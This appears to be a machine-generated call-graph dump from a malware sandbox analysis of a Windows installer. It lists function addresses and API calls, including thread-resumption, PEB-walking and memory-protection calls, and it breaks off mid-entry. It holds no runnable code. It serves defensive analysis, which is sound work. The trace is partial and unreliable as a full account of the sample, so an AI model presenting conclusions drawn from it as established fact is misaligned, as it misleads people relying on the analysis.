FindNextFileW 5996 405ecc FindClose 5992->5996 5992->6008 5995 405f0e 5993->5995 5997 405f12 5995->5997 5998 405f28 5995->5998 5996->5989 5997->5978 6001 4056ca 24 API calls 5997->6001 6000 4056ca 24 API calls 5998->6000 6000->5978 6003 405f1f 6001->6003 6002 405d74 60 API calls 6002->6008 6005 406428 36 API calls 6003->6005 6004 4056ca 24 API calls 6004->5992 6007 405f26 6005->6007 6006 4056ca 24 API calls 6006->6008 6007->5978 6008->5992 6008->6002 6008->6004 6008->6006 6009 406428 36 API calls 6008->6009 6011 406668 lstrcpynW 6008->6011 6012 405d2c 6008->6012 6009->6008 6010->5977 6011->6008 6020 406133 GetFileAttributesW 6012->6020 6015 405d59 6015->6008 6016 405d47 RemoveDirectoryW 6018 405d55 6016->6018 6017 405d4f DeleteFileW 6017->6018 6018->6015 6019 405d65 SetFileAttributesW 6018->6019 6019->6015 6021 405d38 6020->6021 6022 406145 SetFileAttributesW 6020->6022 6021->6015 6021->6016 6021->6017 6022->6021 6030 401941 6031 401943 6030->6031 6036 402da6 6031->6036 6034 405d74 67 API calls 6035 401951 6034->6035 6037 402db2 6036->6037 6038 4066a5 17 API calls 6037->6038 6039 402dd3 6038->6039 6040 401948 6039->6040 6041 4068ef 5 API calls 6039->6041 6040->6034 6041->6040 7169 713c103d 7172 713c101b 7169->7172 7173 713c15b6 GlobalFree 7172->7173 7174 713c1020 7173->7174 7175 713c1024 7174->7175 7176 713c1027 GlobalAlloc 7174->7176 7177 713c15dd 3 API calls 7175->7177 7176->7175 7178 713c103b 7177->7178 6551 401c43 6573 402d84 6551->6573 6553 401c4a 6554 402d84 17 API calls 6553->6554 6555 401c57 6554->6555 6556 401c6c 6555->6556 6557 402da6 17 API calls 6555->6557 6558 401c7c 6556->6558 6559 402da6 17 API calls 6556->6559 6557->6556 6560 401cd3 6558->6560 6561 401c87 6558->6561 6559->6558 6562 402da6 17 API calls 6560->6562 6563 402d84 17 API calls 6561->6563 6565 401cd8 6562->6565 6564 401c8c 6563->6564 6566 402d84 17 API calls 6564->6566 6567 402da6 17 API calls 6565->6567 6568 401c98 6566->6568 6569 401ce1 FindWindowExW 6567->6569 6570 401cc3 SendMessageW 6568->6570 6571 401ca5 SendMessageTimeoutW 6568->6571 6572 401d03 6569->6572 6570->6572 6571->6572 6574 4066a5 17 API calls 6573->6574 6575 402d99 6574->6575 6575->6553 6576 335ef38 6577 335ef91 6576->6577 6578 336c8b9 3 API calls 6577->6578 6579 335efd2 6578->6579 6580 401e4e GetDC 6581 402d84 17 API calls 6580->6581 6582 401e60 GetDeviceCaps MulDiv ReleaseDC 6581->6582 6583 402d84 17 API calls 6582->6583 6584 401e91 6583->6584 6585 4066a5 17 API calls 6584->6585 6586 401ece CreateFontIndirectW 6585->6586 6587 402638 6586->6587 7186 402950 7187 402da6 17 API calls 7186->7187 7189 40295c 7187->7189 7188 402972 7191 406133 2 API calls 7188->7191 7189->7188 7190 402da6 17 API calls 7189->7190 7190->7188 7192 402978 7191->7192 7214 406158 GetFileAttributesW CreateFileW 7192->7214 7194 402985 7195 402a3b 7194->7195 7198 4029a0 GlobalAlloc 7194->7198 7199 402a23 7194->7199 7196 402a42 DeleteFileW 7195->7196 7197 402a55 7195->7197 7196->7197 7198->7199 7200 4029b9 7198->7200 7201 403371 44 API calls 7199->7201 7215 4035f8 SetFilePointer 7200->7215 7202 402a30 CloseHandle 7201->7202 7202->7195 7204 4029bf 7205 4035e2 ReadFile 7204->7205 7206 4029c8 GlobalAlloc 7205->7206 7207 4029d8 7206->7207 7208 402a0c 7206->7208 7209 403371 44 API calls 7207->7209 7210 40620a WriteFile 7208->7210 7213 4029e5 7209->7213 7211 402a18 GlobalFree 7210->7211 7211->7199 7212 402a03 GlobalFree 7212->7208 7213->7212 7214->7194 7215->7204 7216 401956 7217 402da6 17 API calls 7216->7217 7218 40195d lstrlenW 7217->7218 7219 402638 7218->7219 7220 402b59 7221 402b60 7220->7221 7222 402bab 7220->7222 7225 402d84 17 API calls 7221->7225 7226 402ba9 7221->7226 7223 406a35 5 API calls 7222->7223 7224 402bb2 7223->7224 7227 402da6 17 API calls 7224->7227 7228 402b6e 7225->7228 7229 402bbb 7227->7229 7230 402d84 17 API calls 7228->7230 7229->7226 7231 402bbf IIDFromString 7229->7231 7233 402b7a 7230->7233 7231->7226 7232 402bce 7231->7232 7232->7226 7238 406668 lstrcpynW 7232->7238 7237 4065af wsprintfW 7233->7237 7236 402beb CoTaskMemFree 7236->7226 7237->7226 7238->7236 6595 402a5b 6596 402d84 17 API calls 6595->6596 6597 402a61 6596->6597 6598 402aa4 6597->6598 6599 402a88 6597->6599 6603 40292e 6597->6603 6601 402abe 6598->6601 6602 402aae 6598->6602 6600 402a8d 6599->6600 6608 402a9e 6599->6608 6609 406668 lstrcpynW 6600->6609 6604 4066a5 17 API calls 6601->6604 6605 402d84 17 API calls 6602->6605 6604->6608 6605->6608 6608->6603 6610 4065af wsprintfW 6608->6610 6609->6603 6610->6603 6531 40175c 6532 402da6 17 API calls 6531->6532 6533 401763 6532->6533 6534 406187 2 API calls 6533->6534 6535 40176a 6534->6535 6536 406187 2 API calls 6535->6536 6536->6535 7239 401d5d 7240 402d84 17 API calls 7239->7240 7241 401d6e SetWindowLongW 7240->7241 7242 402c2a 7241->7242 7243 406d5f 7244 406be3 7243->7244 7245 40754e 7244->7245 7246 406c64 GlobalFree 7244->7246 7247 406c6d GlobalAlloc 7244->7247 7248 406ce4 GlobalAlloc 7244->7248 7249 406cdb GlobalFree 7244->7249 7246->7247 7247->7244 7247->7245 7248->7244 7248->7245 7249->7248 7250 401563 7251 402ba4 7250->7251 7254 4065af wsprintfW 7251->7254 7253 402ba9 7254->7253 7255 401968 7256 402d84 17 API calls 7255->7256 7257 40196f 7256->7257 7258 402d84 17 API calls 7257->7258 7259 40197c 7258->7259 7260 402da6 17 API calls 7259->7260 7261 401993 lstrlenW 7260->7261 7263 4019a4 7261->7263 7262 4019e5 7263->7262 7267 406668 lstrcpynW 7263->7267 7265 4019d5 7265->7262 7266 4019da lstrlenW 7265->7266 7266->7262 7267->7265 6618 40166a 6619 402da6 17 API calls 6618->6619 6620 401670 6619->6620 6621 40699e 2 API calls 6620->6621 6622 401676 6621->6622 6623 404a6e 6624 404aa4 6623->6624 6625 404a7e 6623->6625 6627 40462b 8 API calls 6624->6627 6626 4045c4 18 API calls 6625->6626 6628 404a8b SetDlgItemTextW 6626->6628 6629 404ab0 6627->6629 6628->6624 6211 40176f 6212 402da6 17 API calls 6211->6212 6213 401776 6212->6213 6214 401796 6213->6214 6215 40179e 6213->6215 6250 406668 lstrcpynW 6214->6250 6251 406668 lstrcpynW 6215->6251 6218 40179c 6222 4068ef 5 API calls 6218->6222 6219 4017a9 6220 405f37 3 API calls 6219->6220 6221 4017af lstrcatW 6220->6221 6221->6218 6224 4017bb 6222->6224 6223 40699e 2 API calls 6223->6224 6224->6223 6225 406133 2 API calls 6224->6225 6227 4017cd CompareFileTime 6224->6227 6228 40188d 6224->6228 6233 406668 lstrcpynW 6224->6233 6236 4066a5 17 API calls 6224->6236 6244 405cc8 MessageBoxIndirectW 6224->6244 6248 401864 6224->6248 6249 406158 GetFileAttributesW CreateFileW 6224->6249 6225->6224 6227->6224 6229 4056ca 24 API calls 6228->6229 6231 401897 6229->6231 6230 4056ca 24 API calls 6246 401879 6230->6246 6232 403371 44 API calls 6231->6232 6234 4018aa 6232->6234 6233->6224 6235 4018be SetFileTime 6234->6235 6237 4018d0 CloseHandle 6234->6237 6235->6237 6236->6224 6238 4018e1 6237->6238 6237->6246 6239 4018e6 6238->6239 6240 4018f9 6238->6240 6242 4066a5 17 API calls 6239->6242 6241 4066a5 17 API calls 6240->6241 6243 401901 6241->6243 6245 4018ee lstrcatW 6242->6245 6243->6246 6247 405cc8 MessageBoxIndirectW 6243->6247 6244->6224 6245->6243 6247->6246 6248->6230 6248->6246 6249->6224 6250->6218 6251->6219 6630 3360506 6633 33612f5 6630->6633 6634 33613a5 6633->6634 6643 336ebf6 6634->6643 6644 336ebfb NtResumeThread 6643->6644 6645 713c170d 6651 713c15b6 6645->6651 6647 713c176b GlobalFree 6648 713c1740 6648->6647 6649 713c1725 6649->6647 6649->6648 6650 713c1757 VirtualFree 6649->6650 6650->6647 6653 713c15bc 6651->6653 6652 713c15c2 6652->6649 6653->6652 6654 713c15ce GlobalFree 6653->6654 6654->6649 6655 335ff07 6656 335ff2d 6655->6656 6657 335ff2c 6655->6657 6667 3361a6a 6656->6667 6657->6656 6658 336088b 6657->6658 6660 3360937 6658->6660 6661 3360932 6658->6661 6662 336089f 6658->6662 6675 33623ff 6661->6675 6663 3361a6a 3 API calls 6662->6663 6665 33608a4 6663->6665 6668 336ac2e 6667->6668 6683 3361a78 6668->6683 6676 336242f 6675->6676 6677 3361a78 3 API calls 6676->6677 6678 336ac33 6677->6678 6679 3361aaf 3 API calls 6678->6679 6680 336ac38 6679->6680 6681 336bcff 2 API calls 6680->6681 6682 336ad19 6681->6682 6682->6682 6684 336c8b9 3 API calls 6683->6684 6685 3361a9f 6684->6685 6690 3361aaf 6685->6690 6687 336ac38 6688 336bcff 2 API calls 6687->6688 6689 336ad19 6688->6689 6689->6689 6691 3361afc 6690->6691 6692 336c8b9 3 API calls 6691->6692 6693 3361b14 6692->6693 6693->6687 6694 401a72 6695 402d84 17 API calls 6694->6695 6696 401a7b 6695->6696 6697 402d84 17 API calls 6696->6697 6698 401a20 6697->6698 7268 401573 7269 401583 ShowWindow 7268->7269 7270 40158c 7268->7270 7269->7270 7271 402c2a 7270->7271 7272 40159a ShowWindow 7270->7272 7272->7271 7273 401b77 7274 402da6 17 API calls 7273->7274 7275 401b7e 7274->7275 7276 402d84 17 API calls 7275->7276 7277 401b87 wsprintfW 7276->7277 7278 402c2a 7277->7278 6699 40167b 6700 402da6 17 API calls 6699->6700 6701 401682 6700->6701 6702 402da6 17 API calls 6701->6702 6703 40168b 6702->6703 6704 402da6 17 API calls 6703->6704 6705 401694 MoveFileW 6704->6705 6706 4016a7 6705->6706 6712 4016a0 6705->6712 6708 40699e 2 API calls 6706->6708 6710 4022f6 6706->6710 6707 401423 24 API calls 6707->6710 6709 4016b6 6708->6709 6709->6710 6711 406428 36 API calls 6709->6711 6711->6712 6712->6707 7279 335ee0e 7280 335ee16 7279->7280 7282 335ee8f 7279->7282 7281 336bcff LoadLibraryA GetPEB 7281->7282 7282->7280 7282->7281 7283 713c1000 7284 713c101b 5 API calls 7283->7284 7285 713c1019 7284->7285 6713 401000 6714 401037 BeginPaint GetClientRect 6713->6714 6715 40100c DefWindowProcW 6713->6715 6717 4010f3 6714->6717 6718 401179 6715->6718 6719 401073 CreateBrushIndirect FillRect DeleteObject 6717->6719 6720 4010fc 6717->6720 6719->6717 6721 401102 CreateFontIndirectW 6720->6721 6722 401167 EndPaint 6720->6722 6721->6722 6723 401112 6 API calls 6721->6723 6722->6718 6723->6722 6065 713c2a7f 6066 713c2acf 6065->6066 6067 713c2a8f VirtualProtect 6065->6067 6067->6066 7286 401503 7287 40150b 7286->7287 7289 40151e 7286->7289 7288 402d84 17 API calls 7287->7288 7288->7289 6724 402c05 SendMessageW 6725 402c2a 6724->6725 6726 402c1f InvalidateRect 6724->6726 6726->6725 6727 713c1979 6728 713c199c 6727->6728 6729 713c19d1 GlobalFree 6728->6729 6730 713c19e3 6728->6730 6729->6730 6731 713c1312 2 API calls 6730->6731 6732 713c1b6e GlobalFree GlobalFree 6731->6732 6733 335e97d 6734 336bcff 2 API calls 6733->6734 6735 335e98a 6734->6735 6736 713c1774 6737 713c17a3 6736->6737 6738 713c1bff 22 API calls 6737->6738 6739 713c17aa 6738->6739 6740 713c17bd 6739->6740 6741 713c17b1 6739->6741 6743 713c17e4 6740->6743 6744 713c17c7 6740->6744 6742 713c1312 2 API calls 6741->6742 6750 713c17bb 6742->6750 6745 713c180e 6743->6745 6746 713c17ea 6743->6746 6747 713c15dd 3 API calls 6744->6747 6749 713c15dd 3 API calls 6745->6749 6748 713c1654 3 API calls 6746->6748 6751 713c17cc 6747->6751 6752 713c17ef 6748->6752 6749->6750 6753 713c1654 3 API calls 6751->6753 6755 713c1312 2 API calls 6752->6755 6754 713c17d2 6753->6754 6756 713c1312 2 API calls 6754->6756 6757 713c17f5 GlobalFree 6755->6757 6758 713c17d8 GlobalFree 6756->6758 6757->6750 6759 713c1809 GlobalFree 6757->6759 6758->6750 6759->6750 6760 405809 6761 4059b3 6760->6761 6762 40582a GetDlgItem GetDlgItem GetDlgItem 6760->6762 6764 4059e4 6761->6764 6765 4059bc GetDlgItem CreateThread CloseHandle 6761->6765 6805 4045f9 SendMessageW 6762->6805 6767 405a0f 6764->6767 6768 405a34 6764->6768 6769 4059fb ShowWindow ShowWindow 6764->6769 6765->6764 6766 40589a 6775 4058a1 GetClientRect GetSystemMetrics SendMessageW SendMessageW 6766->6775 6770 405a6f 6767->6770 6772 405a23 6767->6772 6773 405a49 ShowWindow 6767->6773 6774 40462b 8 API calls 6768->6774 6807 4045f9 SendMessageW 6769->6807 6770->6768 6776 405a7d SendMessageW 6770->6776 6777 40459d SendMessageW 6772->6777 6779 405a69 6773->6779 6780 405a5b 6773->6780 6778 405a42 6774->6778 6781 4058f3 SendMessageW SendMessageW 6775->6781 6782 40590f 6775->6782 6776->6778 6783 405a96 CreatePopupMenu 6776->6783 6777->6768 6787 40459d SendMessageW 6779->6787 6786 4056ca 24 API calls 6780->6786 6781->6782 6784 405922 6782->6784 6785 405914 SendMessageW 6782->6785 6788 4066a5 17 API calls 6783->6788 6789 4045c4 18 API calls 6784->6789 6785->6784 6786->6779 6787->6770 6790 405aa6 AppendMenuW 6788->6790 6791 405932 6789->6791 6792 405ac3 GetWindowRect 6790->6792 6793 405ad6 TrackPopupMenu 6790->6793 6794 40593b ShowWindow 6791->6794 6795 40596f GetDlgItem SendMessageW 6791->6795 6792->6793 6793->6778 6796 405af1 6793->6796 6797 405951 ShowWindow 6794->6797 6798 40595e 6794->6798 6795->6778 6799 405996 SendMessageW SendMessageW 6795->6799 6800 405b0d SendMessageW 6796->6800 6797->6798 6806 4045f9 SendMessageW 6798->6806 6799->6778 6800->6800 6801 405b2a OpenClipboard EmptyClipboard GlobalAlloc GlobalLock 6800->6801 6803 405b4f SendMessageW 6801->6803 6803->6803 6804 405b78 GlobalUnlock SetClipboardData CloseClipboard 6803->6804 6804->6778 6805->6766 6806->6795 6807->6767 6808 404e0b 6809 404e37 6808->6809 6810 404e1b 6808->6810 6812 404e6a 6809->6812 6813 404e3d SHGetPathFromIDListW 6809->6813 6819 405cac GetDlgItemTextW 6810->6819 6815 404e54 SendMessageW 6813->6815 6816 404e4d 6813->6816 6814 404e28 SendMessageW 6814->6809 6815->6812 6817 40140b 2 API calls 6816->6817 6817->6815 6819->6814 7290 40290b 7291 402da6 17 API calls 7290->7291 7292 402912 FindFirstFileW 7291->7292 7293 40293a 7292->7293 7296 402925 7292->7296 7294 402943 7293->7294 7298 4065af wsprintfW 7293->7298 7299 406668 lstrcpynW 7294->7299 7298->7294 7299->7296 7300 40190c 7301 401943 7300->7301 7302 402da6 17 API calls 7301->7302 7303 401948 7302->7303 7304 405d74 67 API calls 7303->7304 7305 401951 7304->7305 7306 40190f 7307 402da6 17 API calls 7306->7307 7308 401916 7307->7308 7309 405cc8 MessageBoxIndirectW 7308->7309 7310 40191f 7309->7310 7311 401f12 7312 402da6 17 API calls 7311->7312 7313 401f18 7312->7313 7314 402da6 17 API calls 7313->7314 7315 401f21 7314->7315 7316 402da6 17 API calls 7315->7316 7317 401f2a 7316->7317 7318 402da6 17 API calls 7317->7318 7319 401f33 7318->7319 7320 401423 24 API calls 7319->7320 7321 401f3a 7320->7321 7328 405c8e ShellExecuteExW 7321->7328 7323 401f82 7325 40292e 7323->7325 7329 406ae0 WaitForSingleObject 7323->7329 7326 401f9f CloseHandle 7326->7325 7328->7323 7330 406afa 7329->7330 7331 406b0c GetExitCodeProcess 7330->7331 7332 406a71 2 API calls 7330->7332 7331->7326 7333 406b01 WaitForSingleObject 7332->7333 7333->7330 7334 401d17 7335 402d84 17 API calls 7334->7335 7336 401d1d IsWindow 7335->7336 7337 401a20 7336->7337 6820 40261c 6821 402da6 17 API calls 6820->6821 6822 402623 6821->6822 6825 406158 GetFileAttributesW CreateFileW 6822->6825 6824 40262f 6825->6824 7345 335fc6b 7346 335fcf8 7345->7346 7347 336ebf6 NtResumeThread 7346->7347 7348 335fda4 7347->7348 7350 335fdf2 7348->7350 7351 336ba54 7348->7351 7350->7350 7354 336bcec GetPEB 7351->7354 7353 336ba59 7354->7353 7355 335d654 7356 336bcff 2 API calls 7355->7356 7357 335d65d 7356->7357 7358 336bcff 2 API calls 7357->7358 7359 335d675 7358->7359 7360 335d682 NtResumeThread 7359->7360 7361 336f30f 7360->7361 7362 713c1058 7364 713c1074 7362->7364 7363 713c10dd 7364->7363 7365 713c1092 7364->7365 7366 713c15b6 GlobalFree 7364->7366 7367 713c15b6 GlobalFree 7365->7367 7366->7365 7368 713c10a2 7367->7368 7369 713c10a9 GlobalSize 7368->7369 7370 713c10b2 7368->7370 7369->7370 7371 713c10b6 GlobalAlloc 7370->7371 7373 713c10c7 7370->7373 7372 713c15dd 3 API calls 7371->7372 7372->7373 7374 713c10d2 GlobalFree 7373->7374 7374->7363 6826 40202a 6827 402da6 17 API calls 6826->6827 6828 402031 6827->6828 6829 406a35 5 API calls 6828->6829 6830 402040 6829->6830 6831 40205c GlobalAlloc 6830->6831 6833 4020cc 6830->6833 6832 402070 6831->6832 6831->6833 6834 406a35 5 API calls 6832->6834 6835 402077 6834->6835 6836 406a35 5 API calls 6835->6836 6837 402081 6836->6837 6837->6833 6841 4065af wsprintfW 6837->6841 6839 4020ba 6842 4065af wsprintfW 6839->6842 6841->6839 6842->6833 7375 40252a 7376 402de6 17 API calls 7375->7376 7377 402534 7376->7377 7378 402da6 17 API calls 7377->7378 7379 40253d 7378->7379 7380 402548 RegQueryValueExW 7379->7380 7383 40292e 7379->7383 7381 40256e RegCloseKey 7380->7381 7382 402568 7380->7382 7381->7383 7382->7381 7386 4065af wsprintfW 7382->7386 7386->7381 6843 401a30 6844 402da6 17 API calls 6843->6844 6845 401a39 ExpandEnvironmentStringsW 6844->6845 6846 401a4d 6845->6846 6848 401a60 6845->6848 6847 401a52 lstrcmpW 6846->6847 6846->6848 6847->6848 6252 405031 GetDlgItem GetDlgItem 6253 405083 7 API calls 6252->6253 6261 4052a8 6252->6261 6254 40512a DeleteObject 6253->6254 6255 40511d SendMessageW 6253->6255 6256 405133 6254->6256 6255->6254 6258 405142 6256->6258 6259 40516a 6256->6259 6257 40538a 6260 405436 6257->6260 6265 405629 6257->6265 6272 4053e3 SendMessageW 6257->6272 6263 4066a5 17 API calls 6258->6263 6264 4045c4 18 API calls 6259->6264 6266 405440 SendMessageW 6260->6266 6267 405448 6260->6267 6261->6257 6262 40536b 6261->6262 6268 405306 6261->6268 6262->6257 6273 40537c SendMessageW 6262->6273 6269 40514c SendMessageW SendMessageW 6263->6269 6270 40517e 6264->6270 6274 40462b 8 API calls 6265->6274 6266->6267 6279 405461 6267->6279 6280 40545a ImageList_Destroy 6267->6280 6284 405471 6267->6284 6311 404f7f SendMessageW 6268->6311 6269->6256 6271 4045c4 18 API calls 6270->6271 6288 40518f 6271->6288 6272->6265 6277 4053f8 SendMessageW 6272->6277 6273->6257 6278 405637 6274->6278 6276 4055eb 6276->6265 6285 4055fd ShowWindow GetDlgItem ShowWindow 6276->6285 6282 40540b 6277->6282 6283 40546a GlobalFree 6279->6283 6279->6284 6280->6279 6281 40526a GetWindowLongW SetWindowLongW 6286 405283 6281->6286 6294 40541c SendMessageW 6282->6294 6283->6284 6284->6276 6289 4054ac 6284->6289 6316 404fff 6284->6316 6285->6265 6290 4052a0 6286->6290 6291 405288 ShowWindow 6286->6291 6287 405317 6287->6262 6288->6281 6293 4051e2 SendMessageW 6288->6293 6295 405265 6288->6295 6298 405220 SendMessageW 6288->6298 6299 405234 SendMessageW 6288->6299 6296 4054f0 6289->6296 6304 4054da SendMessageW 6289->6304 6310 4045f9 SendMessageW 6290->6310 6309 4045f9 SendMessageW 6291->6309 6293->6288 6294->6260 6295->6281 6295->6286 6302 4055b6 6296->6302 6306 405551 6296->6306 6308 405564 SendMessageW SendMessageW 6296->6308 6298->6288 6299->6288 6301 40529b 6301->6265 6303 4055c1 InvalidateRect 6302->6303 6305 4055cd 6302->6305 6303->6305 6304->6296 6305->6276 6325 404f3a 6305->6325 6306->6308 6308->6296 6309->6301 6310->6261 6312 404fa2 GetMessagePos ScreenToClient SendMessageW 6311->6312 6313 404fde SendMessageW 6311->6313 6314 404fd6 6312->6314 6315 404fdb 6312->6315 6313->6314 6314->6287 6315->6313 6328 406668 lstrcpynW 6316->6328 6318 405012 6329 4065af wsprintfW 6318->6329 6320 40501c 6321 40140b 2 API calls 6320->6321 6322 405025 6321->6322 6330 406668 lstrcpynW 6322->6330 6324 40502c 6324->6289 6331 404e71 6325->6331 6327 404f4f 6327->6276 6328->6318 6329->6320 6330->6324 6332 404e8a 6331->6332 6333 4066a5 17 API calls 6332->6333 6334 404eee 6333->6334 6335 4066a5 17 API calls 6334->6335 6336 404ef9 6335->6336 6337 4066a5 17 API calls 6336->6337 6338 404f0f lstrlenW wsprintfW SetDlgItemTextW 6337->6338 6338->6327 7387 335e044 7388 336d7f8 4 API calls 7387->7388 7389 335e0bb 7388->7389 7390 336bcff 2 API calls 7389->7390 7391 335e112 7390->7391 6849 402434 6850 402467 6849->6850 6851 40243c 6849->6851 6852 402da6 17 API calls 6850->6852 6860 402de6 6851->6860 6854 40246e 6852->6854 6865 402e64 6854->6865 6857 402da6 17 API calls 6858 402454 RegDeleteValueW RegCloseKey 6857->6858 6859 40247b 6858->6859 6861 402da6 17 API calls 6860->6861 6862 402dfd 6861->6862 6863 4064d5 RegOpenKeyExW 6862->6863 6864 402443 6863->6864 6864->6857 6864->6859 6866 402e78 6865->6866 6867 402e71 6865->6867 6866->6867 6869 402ea9 6866->6869 6867->6859 6870 4064d5 RegOpenKeyExW 6869->6870 6871 402ed7 6870->6871 6872 402ee7 RegEnumValueW 6871->6872 6873 402f0a 6871->6873 6880 402f81 6871->6880 6872->6873 6874 402f71 RegCloseKey 6872->6874 6873->6874 6875 402f46 RegEnumKeyW 6873->6875 6876 402f4f RegCloseKey 6873->6876 6879 402ea9 6 API calls 6873->6879 6874->6880 6875->6873 6875->6876 6877 406a35 5 API calls 6876->6877 6878 402f5f 6877->6878 6878->6880 6881 402f63 RegDeleteKeyW 6878->6881 6879->6873 6880->6867 6881->6880 7392 404734 lstrlenW 7393 404753 7392->7393 7394 404755 WideCharToMultiByte 7392->7394 7393->7394 7395 401735 7396 402da6 17 API calls 7395->7396 7397 40173c SearchPathW 7396->7397 7398 401757 7397->7398 7399 401d38 7400 402d84 17 API calls 7399->7400 7401 401d3f 7400->7401 7402 402d84 17 API calls 7401->7402 7403 401d4b GetDlgItem 7402->7403 7404 402638 7403->7404 6537 40563e 6538 405662 6537->6538 6539 40564e 6537->6539 6542 40566a IsWindowVisible 6538->6542 6549 40568a 6538->6549 6540 405654 6539->6540 6541 4056ab 6539->6541 6544 404610 SendMessageW 6540->6544 6543 4056b0 CallWindowProcW 6541->6543 6542->6541 6545 405677 6542->6545 6546 40565e 6543->6546 6544->6546 6547 404f7f 5 API calls 6545->6547 6548 405681 6547->6548 6548->6549 6549->6543 6550 404fff 4 API calls 6549->6550 6550->6541 6882 40263e 6883 402652 6882->6883 6884 40266d 6882->6884 6885 402d84 17 API calls 6883->6885 6886 402672 6884->6886 6887 40269d 6884->6887 6895 402659 6885->6895 6888 402da6 17 API calls 6886->6888 6889 402da6 17 API calls 6887->6889 6891 402679 6888->6891 6890 4026a4 lstrlenW 6889->6890 6890->6895 6899 40668a WideCharToMultiByte 6891->6899 6893 40268d lstrlenA 6893->6895 6894 4026e7 6895->6894 6896 4026d1 6895->6896 6900 406239 SetFilePointer 6895->6900 6896->6894 6897 40620a WriteFile 6896->6897 6897->6894 6899->6893 6901 40626d 6900->6901 6902 406255 6900->6902 6901->6896 6903 4061db ReadFile 6902->6903 6904 406261 6903->6904 6904->6901 6905 406276 SetFilePointer 6904->6905 6906 40629e SetFilePointer 6904->6906 6905->6906 6907 406281 6905->6907 6906->6901 6908 40620a WriteFile 6907->6908 6908->6901 6909 3362548 6910 336254a 6909->6910 6911 336c8b9 3 API calls 6910->6911 6912 3362555 6911->6912 6915 336262c 6912->6915 6914 3362622 6916 33626b4 6915->6916 6917 336ebf6 NtResumeThread 6916->6917 6919 33627a1 6917->6919 6918 3362c65 6918->6914 6919->6918 6921 336ebf6 NtResumeThread 6919->6921 6922 3362a2e 6919->6922 6920 3362c12 6920->6914 6921->6922 6922->6920 6923 336ebf6 NtResumeThread 6922->6923 6923->6920 6924 713c2d43 6925 713c2d5b 6924->6925 6926 713c162f 2 API calls 6925->6926 6927 713c2d76 6926->6927 6042 4015c1 6043 402da6 17 API calls 6042->6043 6044 4015c8 6043->6044 6045 405fe2 4 API calls 6044->6045 6057 4015d1 6045->6057 6046 401631 6048 401663 6046->6048 6049 401636 6046->6049 6047 405f64 CharNextW 6047->6057 6052 401423 24 API calls 6048->6052 6061 401423 6049->6061 6058 40165b 6052->6058 6054 405c16 2 API calls 6054->6057 6055 405c33 5 API calls 6055->6057 6056 40164a SetCurrentDirectoryW 6056->6058 6057->6046 6057->6047 6057->6054 6057->6055 6059 401617 GetFileAttributesW 6057->6059 6060 405b99 4 API calls 6057->6060 6059->6057 6060->6057 6062 4056ca 24 API calls 6061->6062 6063 401431 6062->6063 6064 406668 lstrcpynW 6063->6064 6064->6056 6928 4028c4 6929 4028ca 6928->6929 6930 4028d2 FindClose 6929->6930 6931 402c2a 6929->6931 6930->6931 6068 4040c5 6069 4040dd 6068->6069 6070 40423e 6068->6070 6069->6070 6071 4040e9 6069->6071 6072 40424f GetDlgItem GetDlgItem 6070->6072 6077 40428f 6070->6077 6074 4040f4 SetWindowPos 6071->6074 6075 404107 6071->6075 6076 4045c4 18 API calls 6072->6076 6073 4042e9 6078 404610 SendMessageW 6073->6078 6083 404239 6073->6083 6074->6075 6079 404110 ShowWindow 6075->6079 6080 404152 6075->6080 6081 404279 SetClassLongW 6076->6081 6077->6073 6082 401389 2 API calls 6077->6082 6109 4042fb 6078->6109 6084 404130 GetWindowLongW 6079->6084 6085 40422b 6079->6085 6086 404171 6080->6086 6087 40415a DestroyWindow 6080->6087 6088 40140b 2 API calls 6081->6088 6092 4042c1 6082->6092 6084->6085 6094 404149 ShowWindow 6084->6094 6151 40462b 6085->6151 6090 404176 SetWindowLongW 6086->6090 6091 404187 6086->6091 6089 40456e 6087->6089 6088->6077 6089->6083 6101 40457e ShowWindow 6089->6101 6090->6083 6091->6085 6095 404193 GetDlgItem 6091->6095 6092->6073 6096 4042c5 SendMessageW 6092->6096 6094->6080 6099 4041c1 6095->6099 6100 4041a4 SendMessageW IsWindowEnabled 6095->6100 6096->6083 6097 40140b 2 API calls 6097->6109 6098 40454f DestroyWindow EndDialog 6098->6089 6103 4041ce 6099->6103 6106 404215 SendMessageW 6099->6106 6107 4041e1 6099->6107 6115 4041c6 6099->6115 6100->6083 6100->6099 6101->6083 6102 4066a5 17 API calls 6102->6109 6103->6106 6103->6115 6105 4045c4 18 API calls 6105->6109 6106->6085 6110 4041e9 6107->6110 6111 4041fe 6107->6111 6108 4041fc 6108->6085 6109->6083 6109->6097 6109->6098 6109->6102 6109->6105 6132 40448f DestroyWindow 6109->6132 6142 4045c4 6109->6142 6113 40140b 2 API calls 6110->6113 6112 40140b 2 API calls 6111->6112 6114 404205 6112->6114 6113->6115 6114->6085 6114->6115 6148 40459d 6115->6148 6117 404376 GetDlgItem 6118 404393 ShowWindow KiUserCallbackDispatcher 6117->6118 6119 40438b 6117->6119 6145 4045e6 EnableWindow 6118->6145 6119->6118 6121 4043bd EnableWindow 6126 4043d1 6121->6126 6122 4043d6 GetSystemMenu EnableMenuItem SendMessageW 6123 404406 SendMessageW 6122->6123 6122->6126 6123->6126 6125 4040a6 18 API calls 6125->6126 6126->6122 6126->6125 6146 4045f9 SendMessageW 6126->6146 6147 406668 lstrcpynW 6126->6147 6128 404435 lstrlenW 6129 4066a5 17 API calls 6128->6129 6130 40444b SetWindowTextW 6129->6130 6131 401389 2 API calls 6130->6131 6131->6109 6132->6089 6133 4044a9 CreateDialogParamW 6132->6133 6133->6089 6134 4044dc 6133->6134 6135 4045c4 18 API calls 6134->6135 6136 4044e7 GetDlgItem GetWindowRect ScreenToClient SetWindowPos 6135->6136 6137 401389 2 API calls 6136->6137 6138 40452d 6137->6138 6138->6083 6139 404535 ShowWindow 6138->6139 6140 404610 SendMessageW 6139->6140 6141 40454d 6140->6141 6141->6089 6143 4066a5 17 API calls 6142->6143 6144 4045cf SetDlgItemTextW 6143->6144 6144->6117 6145->6121 6146->6126 6147->6128 6149 4045a4 6148->6149 6150 4045aa SendMessageW 6148->6150 6149->6150 6150->6108 6152 4046ee 6151->6152 6153 404643 GetWindowLongW 6151->6153 6152->6083 6153->6152 6154 404658 6153->6154 6154->6152 6155 404685 GetSysColor 6154->6155 6156 404688 6154->6156 6155->6156 6157 404698 SetBkMode 6156->6157 6158 40468e SetTextColor 6156->6158 6159 4046b0 GetSysColor 6157->6159 6160 4046b6 6157->6160 6158->6157 6159->6160 6161 4046bd SetBkColor 6160->6161 6162 4046c7 6160->6162 6161->6162 6162->6152 6163 4046e1 CreateBrushIndirect 6162->6163 6164 4046da DeleteObject 6162->6164 6163->6152 6164->6163 6935 4016cc 6936 402da6 17 API 